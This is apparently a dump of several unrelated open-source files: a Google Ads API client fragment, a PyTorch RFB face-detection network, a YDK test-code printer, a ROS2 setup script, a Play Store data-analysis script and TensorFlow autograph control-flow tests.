"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, UserInterestServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the user interest service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.UserInterestServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
if os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") not in (
"true",
"false",
):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
use_client_cert = (
os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true"
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT
if is_mtls
else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, UserInterestServiceTransport):
# transport is a UserInterestServiceTransport instance.
if credentials:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = UserInterestServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_user_interest(
self,
request: Union[
user_interest_service.GetUserInterestRequest, dict
] = None,
*,
resource_name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> user_interest.UserInterest:
r"""Returns the requested user interest in full detail
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (Union[google.ads.googleads.v9.services.types.GetUserInterestRequest, dict]):
The request object. Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v9.services.UserInterestService.GetUserInterest].
resource_name (:class:`str`):
Required. Resource name of the
UserInterest to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v9.resources.types.UserInterest:
A user interest: a particular
interest-based vertical to be targeted.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a user_interest_service.GetUserInterestRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, user_interest_service.GetUserInterestRequest
):
request = user_interest_service.GetUserInterestRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_user_interest
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("resource_name", request.resource_name),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
__all__ = ("UserInterestServiceClient",)
|
the-stack_0_3806 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Conv2d, Sequential, ModuleList, ReLU
from src.ssd import SSD
from src import rfb_config
from src import config
rfb_config.define_img_size(config.NETWORK_INPUT_SIZE)
class BasicConv(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1,
padding=0, dilation=1, groups=1, relu=True, bn=True):
super(BasicConv, self).__init__()
self.out_channels = out_planes
if bn:
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=False)
self.bn = nn.BatchNorm2d(out_planes, eps=1e-5, momentum=0.01, affine=True)
self.relu = nn.ReLU(inplace=True) if relu else None
else:
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=True)
self.bn = None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class BasicRFB(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, scale=0.1, map_reduce=8, vision=1, groups=1):
super(BasicRFB, self).__init__()
self.scale = scale
self.out_channels = out_planes
inter_planes = in_planes // map_reduce
self.branch0 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, 2 * inter_planes, kernel_size=(3, 3),
stride=stride, padding=(1, 1), groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 1, dilation=vision + 1, relu=False, groups=groups)
)
self.branch1 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, 2 * inter_planes, kernel_size=(3, 3),
stride=stride, padding=(1, 1), groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 2, dilation=vision + 2, relu=False, groups=groups)
)
self.branch2 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, (inter_planes // 2) * 3, kernel_size=3,
stride=1, padding=1, groups=groups),
BasicConv((inter_planes // 2) * 3, 2 * inter_planes, kernel_size=3,
stride=stride, padding=1, groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 4, dilation=vision + 4, relu=False, groups=groups)
)
self.ConvLinear = BasicConv(6 * inter_planes, out_planes, kernel_size=1, stride=1, relu=False)
self.shortcut = BasicConv(in_planes, out_planes, kernel_size=1, stride=stride, relu=False)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
out = self.ConvLinear(out)
short = self.shortcut(x)
out = out * self.scale + short
out = self.relu(out)
return out
class RFB(nn.Module):
def __init__(self, num_classes=2, reduced=False):
super(RFB, self).__init__()
self.base_channel = 8 * 2
def conv_bn(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True))
def conv_dw(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
nn.BatchNorm2d(inp),
nn.ReLU(inplace=True),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True))
self.model = nn.Sequential(
conv_bn(3, self.base_channel, 2), # 160*120
conv_dw(self.base_channel, self.base_channel * 2, 1),
conv_dw(self.base_channel * 2, self.base_channel * 2, 2), # 80*60
conv_dw(self.base_channel * 2, self.base_channel * 2, 1),
conv_dw(self.base_channel * 2, self.base_channel * 4, 2), # 40*30
conv_dw(self.base_channel * 4, self.base_channel * 4, 1),
conv_dw(self.base_channel * 4, self.base_channel * 4, 1),
conv_dw(self.base_channel * 4, self.base_channel * 4, 1) if reduced else BasicRFB(self.base_channel * 4, self.base_channel * 4, stride=1, scale=1.0),
conv_dw(self.base_channel * 4, self.base_channel * 8, 2), # 20*15
conv_dw(self.base_channel * 8, self.base_channel * 8, 1),
conv_dw(self.base_channel * 8, self.base_channel * 8, 1),
conv_dw(self.base_channel * 8, self.base_channel * 16, 2), # 10*8
conv_dw(self.base_channel * 16, self.base_channel * 16, 1)
)
self.fc = nn.Linear(1024, num_classes)
def forward(self, x):
x = self.model(x)
x = F.avg_pool2d(x, 7)
x = x.view(-1, 1024)
x = self.fc(x)
return x
def deepPointwiseConv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0):
"""Replace Conv2d with a depthwise Conv2d and Pointwise Conv2d."""
return Sequential(
Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=kernel_size,
groups=in_channels, stride=stride, padding=padding),
ReLU(),
Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1))
def create_net(num_classes, is_test=False, device="cuda", reduced=False):
base_net = RFB(2, reduced=reduced)
base_net_model = base_net.model # disable dropout layer
source_layer_indexes = [8, 11, 13]
extras = ModuleList([
Sequential(
Conv2d(in_channels=base_net.base_channel * 16, out_channels=base_net.base_channel * 4, kernel_size=1),
ReLU(),
deepPointwiseConv2d(in_channels=base_net.base_channel * 4,
out_channels=base_net.base_channel * 16, kernel_size=3, stride=2, padding=1),
ReLU()
)
])
regression_headers = ModuleList([
deepPointwiseConv2d(in_channels=base_net.base_channel * 4, out_channels=3 * 4, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 8, out_channels=2 * 4, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 16, out_channels=2 * 4, kernel_size=3, padding=1),
Conv2d(in_channels=base_net.base_channel * 16, out_channels=3 * 4, kernel_size=3, padding=1)
])
classification_headers = ModuleList([
deepPointwiseConv2d(in_channels=base_net.base_channel * 4, out_channels=3 * num_classes, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 8, out_channels=2 * num_classes, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 16, out_channels=2 * num_classes, kernel_size=3, padding=1),
Conv2d(in_channels=base_net.base_channel * 16, out_channels=3 * num_classes, kernel_size=3, padding=1)
])
return SSD(num_classes, base_net_model, source_layer_indexes,
extras, classification_headers, regression_headers, is_test=is_test, config=rfb_config, device=device)
|
the-stack_0_3807 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
test_printer.py
Test printer.
"""
from ydkgen.common import iscppkeyword
from ydkgen.builder import TestBuilder
from ydkgen.builder import FixtureBuilder
from .test_fixture_printer import FixturePrinter
from ydkgen.common import get_top_class, get_element_path, get_path_sep, get_obj_name, \
get_qn, is_reference_prop, is_terminal_prop, is_empty_prop, \
is_identity_prop, is_decimal64_prop
_IGNORE_TESTS = set({'ietf_netconf_acm'})
class TestPrinter(FixturePrinter):
"""Test printer."""
def __init__(self, ctx, lang):
super(TestPrinter, self).__init__(ctx, lang)
def print_tests(self, package, identity_subclasses):
"""Print all test case."""
self.package = package
self.identity_subclasses = identity_subclasses
test_builder = TestBuilder(self.lang, identity_subclasses)
fixture_builder = FixtureBuilder(self.lang, identity_subclasses)
test_builder.build_test(package)
imports = fixture_builder.get_imports(package, test_builder)
self.print_fixture_head(package, imports)
if package.name not in _IGNORE_TESTS:
self._print_test_case(package, imports, test_builder)
self.print_fixture_tail(package)
def _print_test_case(self, package, imports, test_builder):
"""Print a single test case."""
for test_case in test_builder.test_cases:
stmts = test_case.stmts
test_name = test_case.test_name
clazz = test_case.clazz
top_classes = list(test_case.ref_top_classes.values())
self._print_test_case_header(test_name)
self._print_test_case_body(stmts, clazz, top_classes)
self._print_test_case_trailer()
def _print_test_case_body(self, stmts, clazz, top_classes):
self._print_test_case_requisites(stmts)
self._print_test_case_crud_stmts(stmts, clazz, top_classes)
self._print_test_case_cleanup(clazz, top_classes)
self._print_test_case_compare(clazz)
def _print_test_case_requisites(self, stmts):
self._print_requsite_declarations(stmts)
self._print_requisite_stmts(stmts)
self._print_unadjust_leaflist_append_stmts(stmts)
self._print_requisite_reference_stmts(stmts)
self._print_requisite_adjustments(stmts)
self._print_requisite_leaflist_adjusted(stmts)
def _print_requsite_declarations(self, stmts):
for path, val in stmts.declaration_stmts.items():
self._write_end(self.declaration_fmt.format(path, val))
def _print_unadjust_leaflist_append_stmts(self, stmts):
for path, val in stmts.unadjusted_leaflist_appends:
self._write_end(self.leaflist_append_fmt.format(path, val))
def _print_requisite_stmts(self, stmts):
sorted_paths = sorted(list(stmts.append_stmts.keys()) +
list(stmts.assignment_stmts.keys()))
for path in sorted_paths:
if path in stmts.append_stmts:
self._print_requisite_list_append(stmts, path)
elif path in stmts.assignment_stmts:
self._print_requisite_assignment(stmts, path)
def _print_requisite_list_append(self, stmts, path):
val = stmts.append_stmts[path]
self._print_requisite_list_parent_pointer(path, val)
self._write_end(self.append_fmt.format(path, val))
def _print_requisite_list_parent_pointer(self, path, val):
# parent pointer is set by YList append method in Python,
# no need to print
if self.lang == 'cpp' and self.sep in path:
parent = self.sep.join(path.split(self.sep)[:-1])
parent_path = self.sep.join([val, 'parent'])
self._write_end(self.cpp_leaf_fmt.format(parent_path, parent))
def _print_requisite_assignment(self, stmts, path):
val = stmts.assignment_stmts[path]
fmt = self.get_assignment_fmt(path)
self._write_end(fmt.format(path, val))
def _print_requisite_reference_stmts(self, stmts):
for path in sorted(stmts.reference_stmts):
val = stmts.reference_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
def _print_requisite_adjustments(self, stmts):
for path in sorted(stmts.adjustment_stmts):
val = stmts.adjustment_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
for path in sorted(stmts.reference_adjustment_stmts):
val = stmts.reference_adjustment_stmts[path]
self._write_end(self.ref_fmt.format(path, val))
def _print_requisite_leaflist_adjusted(self, stmts):
for path, val in stmts.adjusted_leaflist_appends.items():
self._write_end(self.leaflist_append_fmt.format(path, val))
def _print_test_case_crud_stmts(self, stmts, clazz, top_classes):
for top_class in top_classes:
self._print_crud_create_stmts(top_class)
top_class = get_top_class(clazz)
self._print_crud_create_stmts(top_class)
self._print_crud_read_stmts(top_class)
def _print_crud_create_stmts(self, top_class):
top_obj_name = get_obj_name(top_class)
self._print_logging('Creating {}...'.format(top_obj_name))
fmt = self._get_crud_fmt('create')
self._write_end(fmt.format(top_obj_name))
def _print_crud_read_stmts(self, top_class):
top_obj_name = get_obj_name(top_class)
read_obj_name = '{}_read'.format(top_obj_name)
filter_obj_name = '{}_filter'.format(top_obj_name)
qn = get_qn(self.lang, top_class)
self._print_logging('Reading {}...'.format(top_obj_name))
self._write_end(self.declaration_fmt.format(filter_obj_name, qn))
fmt = self._get_crud_fmt('read')
stmt = fmt.format(filter_obj_name)
fmt = self.read_ret_fmt
if self.lang == 'py':
self._write_end(fmt.format(read_obj_name, stmt))
elif self.lang == 'cpp':
self._write_end('auto read_unique_ptr = {}'.format(stmt))
self._write_end('CHECK( read_unique_ptr != nullptr)')
self._write_end(fmt.format(read_obj_name, qn, 'read_unique_ptr'))
def _print_test_case_cleanup(self, clazz, top_classes):
self._print_crud_delete_stmts(clazz)
for clazz in top_classes:
self._print_crud_delete_stmts(clazz)
def _print_crud_delete_stmts(self, clazz):
top_class = get_top_class(clazz)
top_obj_name = get_obj_name(top_class)
fmt = self._get_crud_fmt('delete')
self._print_logging('Deleting {}...'.format(top_obj_name))
self._write_end(fmt.format(top_obj_name))
def _print_test_case_compare(self, clazz):
self._print_logging('Comparing leaf/leaf-lists...')
for prop in clazz.properties():
if is_reference_prop(prop) or is_terminal_prop(prop):
# unable to compare empty
# read object will not be assigned to Empty() automatically
if not is_empty_prop(prop):
self._print_compare_stmt(prop)
def _print_compare_stmt(self, prop):
if is_identity_prop(prop) or is_decimal64_prop(prop):
# unable to compare decimal64 in Python
# unable to compare identity in C++ and Python
return
lhs = self._get_element_path(prop)
top_class_name, path = lhs.split(self.sep, 1)
top_class_name = '{}_read'.format(top_class_name)
rhs = self.sep.join([top_class_name, path])
self._write_end(self.compare_fmt.format(lhs, rhs))
def _print_test_case_header(self, test_name):
if self.lang == 'py':
self._writeln('def test_{}s(self):'.format(test_name))
elif self.lang == 'cpp':
self._writeln('TEST_CASE_METHOD( ConnectionFixture, "{}_{}_test" )'.format(self.package.name, test_name))
self._writeln('{')
self._lvl_inc()
self._lvl_inc()
def _print_test_case_trailer(self):
self._lvl_dec()
if self.lang == 'py':
self._bline()
elif self.lang == 'cpp':
self._lvl_dec()
self._writeln('}')
self._bline()
def _print_logging(self, msg):
self._bline()
if self.lang == 'py':
self._write_end('logger.info("{}")'.format(msg))
def get_assignment_fmt(self, path):
fmt = '{} = {}'
if self.sep not in path and self.lang == 'cpp':
fmt = 'auto {} = {}'
return fmt
def _get_crud_fmt(self, oper):
if self.lang == 'py':
fmt = 'self.crud.{}(self.ncc, {{}})'.format(oper)
elif self.lang == 'cpp':
if iscppkeyword(oper):
oper = '{}_'.format(oper)
fmt = 'm_crud.{}(*m_provider, *{{}})'.format(oper)
return fmt
@property
def declaration_fmt(self):
fmt = '{} = {}()'
if self.lang == 'cpp':
fmt = 'auto {} = std::make_unique<{}>()'
return fmt
@property
def leaflist_append_fmt(self):
fmt = '{}.append({})'
if self.lang == 'cpp':
fmt = '{}.append(std::move({}))'
return fmt
@property
def append_fmt(self):
fmt = '{}.append({})'
if self.lang == 'cpp':
fmt = '{}.emplace_back(std::move({}))'
return fmt
@property
def cpp_leaf_fmt(self):
return '{} = {}.get()'
@property
def ref_fmt(self):
fmt = '{} = {}'
if self.lang == 'cpp':
fmt = '{} = {}.get()'
return fmt
@property
def compare_fmt(self):
fmt = 'self.assertEqual({}, {})'
if self.lang == 'cpp':
fmt = 'CHECK( {} == {} )'
return fmt
@property
def read_ret_fmt(self):
fmt = '{} = {}'
if self.lang == 'cpp':
fmt = 'auto {} = dynamic_cast<{}*>({}.get())'
return fmt
def _get_element_path(self, element):
return get_element_path(self.lang, element)
@property
def sep(self):
return get_path_sep(self.lang)
|
the-stack_0_3809 | from setuptools import setup
package_name = 'carebt_kb'
setup(
name=package_name,
version='0.0.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='Andreas Steck',
maintainer_email='[email protected]',
description='A ROS2 Knowledge Base implementation.',
license='Apache License 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'carebt_kb = carebt_kb.carebt_kb:main'
],
},
)
|
the-stack_0_3810 | # %%
import pandas as pd
import numpy as np
# %%
# Data Preprocess
df=pd.read_csv("./dataset/google-play-store-apps/googleplaystore.csv")
for i in df:
print(df[i].value_counts())
df.replace("NaN",np.nan,inplace=True)
df.isnull().sum()
# %%
df.dropna(inplace=True)
# %%
out=pd.DataFrame(df,columns=["App","Category","Rating","Reviews","Size","Installs","Price","ContentRating"])
out.to_csv("preprocess.csv",index=None)
# %%
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
#matplotlib画图中中文显示会有问题,需要这两行设置默认字体
df=pd.read_csv("./dataset/google-play-store-apps/googleplaystore.csv")
df.drop_duplicates(subset='App', inplace=True)#去重
df = df[df['AndroidVer'] != np.nan]#去除掉空值
df = df[df['AndroidVer'] != 'NaN']#去除掉空值
df = df[df['Installs'] != 'Free']#去除掉串列明显写错的sample
df = df[df['Installs'] != 'Paid']#去除掉串列明显写错的sample
print('Number of apps in the dataset : ' , len(df))
df['Installs']= df['Installs'].apply(lambda x: x.replace('+', '') if '+' in str(x) else x)
df['Installs']= df['Installs'].apply(lambda
x: x.replace(',', '') if ',' in str(x) else x)
df['Installs']= df['Installs'].apply(lambda x: int(x))
df['Size'] = df['Size'].apply(lambda x: str(x).replace('Varies with device', 'NaN') if 'Varies with device' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: str(x).replace('M', '') if 'M' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: str(x).replace(',', '') if 'M' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: float(str(x).replace('k', '')) / 1000 if 'k' in str(x) else x)
df['Size'] = df['Size'].apply(lambda x: float(x))
df['Installs']=df['Installs'].apply(lambda x: float(x))
df['Price'] = df['Price'].apply(lambda x: str(x).replace('$', '') if '$' in str(x) else str(x))
df['Price'] = df['Price'].apply(lambda x: float(x))
df['Reviews']= df['Reviews'].apply(lambda
x: int(x))
# %%
plt.figure(figsize=(15,10))
g=sns.countplot(x="Category",data=df, palette = "Set1")
g.set_xticklabels(g.get_xticklabels(), rotation=90, ha="right")
plt.savefig('CountApps.png', dpi=1000)
plt.show()
# %%
x = df['Rating'].dropna()
y = df['Size'].dropna()
z = df['Installs'][df.Installs!=0].dropna()
p = df['Reviews'][df.Reviews!=0].dropna()
t = df['Type'].dropna()
price = df['Price']
p= sns.pairplot(pd.DataFrame(list(zip(x, y, np.log(z), np.log10(p), t, price)),
columns=['Rating','Size', 'Installs', 'Reviews', 'Type', 'Price']), hue='Type', palette="Set2")
plt.savefig('relation.png', dpi=300)
plt.show()
# %%
plt.figure(figsize=(10,10))
sns.boxplot(x="Type", y="Rating", hue="ContentRating", data=df, palette="PRGn")
plt.savefig('box.png', dpi=600)
plt.show()
# %%
subset_df= df[df.Category.isin(['GAME', 'FAMILY', 'PHOTOGRAPHY', 'MEDICAL', 'TOOLS', 'FINANCE','LIFESTYLE','BUSINESS'])]
sns.set_style('darkgrid')
fig, ax = plt.subplots()
fig.set_size_inches(15, 8)
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus'] = False
p = sns.stripplot(x="Price", y="Category", data=subset_df, jitter=True, linewidth=1)
#title = ax.set_title('不同类别的App的价格趋势',size = 25)
plt.savefig('不同类别的App的价格趋势.png', dpi=300)
plt.show()
# %%
df[['Category', 'App']][df.Price > 200]
fig, ax = plt.subplots()
fig.set_size_inches(15, 8)
subset_df_price= subset_df[subset_df.Price<100]
p = sns.stripplot(x="Price", y="Category", data=subset_df_price, jitter=True, linewidth=1)
plt.savefig('Price.png', dpi=300)
plt.show()
# %%
|
the-stack_0_3811 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for control_flow module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.autograph.converters import control_flow
from tensorflow.python.autograph.core import converter_testing
from tensorflow.python.autograph.pyct import transformer
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ControlFlowTest(converter_testing.TestCase):
def assertTransformedResult(self, test_fn, inputs, expected):
if not isinstance(inputs, tuple):
inputs = (inputs,)
with self.converted(test_fn, control_flow, {},
constant_op.constant) as result:
with self.cached_session() as sess:
self.assertEqual(sess.run(result.test_fn(*inputs)), expected)
@test_util.run_deprecated_v1
def test_while_basic(self):
def test_fn(n):
i = 0
s = 0
while i < n:
s += i
i += 1
return s, i, n
self.assertTransformedResult(test_fn, constant_op.constant(5), (10, 5, 5))
@test_util.run_deprecated_v1
def test_while_nested(self):
def test_fn(n):
i = 0
j = 0
s = 0
while i < n:
while j < i:
j += 3
u = i + j # 'u' is not defined within the inner loop
s += u
i += 1
j = 0
return s, i, j, n
self.assertTransformedResult(test_fn, constant_op.constant(5),
(25, 5, 0, 5))
@test_util.run_deprecated_v1
def test_while_single_output(self):
def test_fn(n):
while n > 0:
n -= 1
return n
self.assertTransformedResult(test_fn, constant_op.constant(5), 0)
def test_while_variable_defined_in_body(self):
def bad_while_loop(n):
while n > 0:
n -= 1
s = n
return s
node, ctx = self.prepare(bad_while_loop, {})
with self.assertRaises(NameError):
control_flow.transform(node, ctx)
@test_util.run_deprecated_v1
def test_if_basic(self):
def test_fn(n):
a = 0
b = 0
if n > 0:
a = -n
else:
b = 2 * n
return a, b
self.assertTransformedResult(test_fn, constant_op.constant(1), (-1, 0))
self.assertTransformedResult(test_fn, constant_op.constant(-1), (0, -2))
@test_util.run_deprecated_v1
def test_if_complex_outputs(self):
class TestClass(object):
def __init__(self, a, b):
self.a = a
self.b = b
def test_fn(n, obj):
obj.a = 0
obj.b = 0
if n > 0:
obj.a = -n
else:
obj.b = 2 * n
return obj
with self.converted(test_fn, control_flow, {}) as result:
with self.cached_session() as sess:
res_obj = result.test_fn(constant_op.constant(1), TestClass(0, 0))
self.assertEqual(sess.run((res_obj.a, res_obj.b)), (-1, 0))
res_obj = result.test_fn(constant_op.constant(-1), TestClass(0, 0))
self.assertEqual(sess.run((res_obj.a, res_obj.b)), (0, -2))
@test_util.run_deprecated_v1
def test_if_single_output(self):
def test_fn(n):
if n > 0:
n = -n
return n
self.assertTransformedResult(test_fn, constant_op.constant(1), -1)
@test_util.run_deprecated_v1
def test_if_semi(self):
def test_fn(n):
if n > 0:
n = 3
return n
self.assertTransformedResult(test_fn, constant_op.constant(2), 3)
self.assertTransformedResult(test_fn, constant_op.constant(-3), -3)
@test_util.run_deprecated_v1
def test_if_local_var(self):
def test_fn(n):
if n > 0:
b = 4
n = b + 1
return n
self.assertTransformedResult(test_fn, constant_op.constant(1), 5)
self.assertTransformedResult(test_fn, constant_op.constant(-1), -1)
@test_util.run_deprecated_v1
def test_if_no_outputs(self):
def test_fn(n):
if n > 0:
b = 4 # pylint:disable=unused-variable
return n
# Without side effect guards, the if statement will stage a cond,
# but that will be pruned at execution.
